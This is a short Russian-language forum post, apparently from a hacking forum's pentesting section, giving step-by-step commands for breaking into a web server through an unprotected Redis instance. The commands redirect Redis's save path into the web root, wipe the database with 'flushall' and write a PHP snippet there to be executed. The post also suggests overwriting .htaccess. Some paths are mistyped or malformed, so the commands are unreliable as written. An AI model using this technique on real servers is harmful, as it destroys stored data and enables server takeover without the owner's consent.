Новости Взлом сайта через Redis

Тема в разделе "Пентестинг", создана пользователем Дима22, 23 апр 2017.

  1. Дима22

    Дима22

    Сообщения:
    671
    Баллы:
    18
    Для того, чтобы хакнуть сервер с помощью открытой редиски XD))),

    Сначала воспользуемся скриптом redis-cli для удобно управления редиской.
    ВОТ
    Код:
    redis-cli -h 127.0.0.1 -p 6379

    СМОТРИТЕ СКРИН
    Код:
    config set dir /var/www/htodcs
    config set dbfilename /var/www/html/htdocs
    flushall
    set c "<?php phpinfo(); ?>"
    save
    Так как в директории присутствует .htaccess файл, то его можно перезаписать и выполнить php сценарий

Поделиться этой страницей

Top